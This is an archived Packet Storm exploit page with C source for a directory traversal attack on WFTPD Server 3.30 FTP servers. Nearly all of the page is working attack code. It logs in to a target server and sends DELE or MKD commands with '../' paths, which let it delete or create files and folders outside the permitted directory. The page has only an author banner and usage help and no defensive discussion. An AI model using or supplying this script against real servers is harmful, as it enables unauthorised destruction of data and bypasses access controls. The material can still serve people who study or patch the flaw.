WFTPD Server version 3.30 directory traversal exploit.
2e2fb1913a585ae5cf5f8fb18da7901f4b134cb92fceedd7436ccec16353d38f#include<stdio.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<unistd.h>
#define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)
#define POCNAME "[*]WFTPD 3.30 Multiple remote vulnerabilities(0day)"
#define AUTHOR "[*]fl0 fl0w"
typedef int i32;
typedef char i8;
typedef short i16;
enum {
True=1,
False=0,
Error=-1
};
struct {
i8 *USERx,
*PASSx,
*HOST;
i16 PORTx;
}def;
i8 *USER=0,*PASS=0,*dir=0,*host_addr=0,
sendbytes[250],recev[250];
i16 PORT=0,option;
i32 args(i32 argc,i8** argv){
i32 i;
argc--;
for(i=1;i<argc;i++){
switch(argv[i][1]){
case 'h':
host_addr=argv[++i];
break;
case 'u':
USER=argv[++i];
break;
case 'w':
PASS=argv[++i];
break;
case 'p':
PORT=atoi(argv[++i]);
break;
case 'o':
option=atoi(argv[++i]);
break;
default:{
printf("error with argument nr %d:(%s)\n",i,argv[i]);
return Error;
exit(0);
}
}
}
// printf(" %s\n %s\n %s\n %d\n %d\n %s\n",host_addr,USER,PASS,PORT,option,argv[argc]);
return 1;
}
void bf_error(i8* B){
i32 e;
if(B==NULL)
e=0;
else
e=1;
}
void syntax(){
i8 *help[]={"\t-h hostname",
"\t-u Username",
"\t-w watchword(password)",
"\t-p port(default 21)",
"\t-o option:",
"\t 1 - delete folder,files",
"\t 2 - make folder",
"\t ../ move up 1 dir ../../ move up 2 dirs etc"
/*directory transversal*/
};
i32 i;
size_t com=sizeof help / sizeof help[0];
for(i=0;i<com;i++){
printf("%s\n",help[i]);
}
}
void defaults(){
def.HOST="localhost";
def.PASSx="hacker";
def.USERx="anonymous";
def.PORTx=21;
//printf("%s %s %s %d",def.HOST,def.PASSx,def.USERx,def.PORTx);
}
i32 main(i32 argc,i8** argv){
if(argc<3){
printf("%s\n%s\n",POCNAME,AUTHOR);
printf("\tToo few arguments\n syntax is:\n");
syntax();
exit(0);
}
args(argc,argv);
i32 sok,
svcon,
sokaddr;
printf("[*]Starting \n \t...\n");
struct sockaddr_in sockaddr_sok;
sokaddr = sizeof(sockaddr_sok);
sockaddr_sok.sin_family = AF_INET;
sockaddr_sok.sin_addr.s_addr = inet_addr(host_addr);
sockaddr_sok.sin_port = htons(PORT);
sok=socket(AF_INET,SOCK_STREAM,0);
if(sok==-1){
printf("[*]FAILED SOCKET\n");
exit(0);
}
svcon=connect(sok,(struct sockaddr*)&sockaddr_sok,sokaddr);
i8 use[10];
if(svcon!=-1){
sprintf(sendbytes, "USER %s\r\n",USER);
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("User send error\n");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
}
sprintf(sendbytes, "PASS %s\r\n",PASS);
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("Password send error\n");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
printf("%s\n",recev);
}
sprintf(sendbytes, "SYST\r\n");
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("Syst send error\n");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
}
if(option==1){
sprintf(sendbytes,"DELE %s\r\n",argv[11]);
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("Syst send error\n");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
}
}else if(option==2){
sprintf(sendbytes,"MKD %s\r\n",argv[11]);
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("Syst send error\n");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
}
}
}else printf("Connect error\n");
printf("[*]Exploit done!");
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed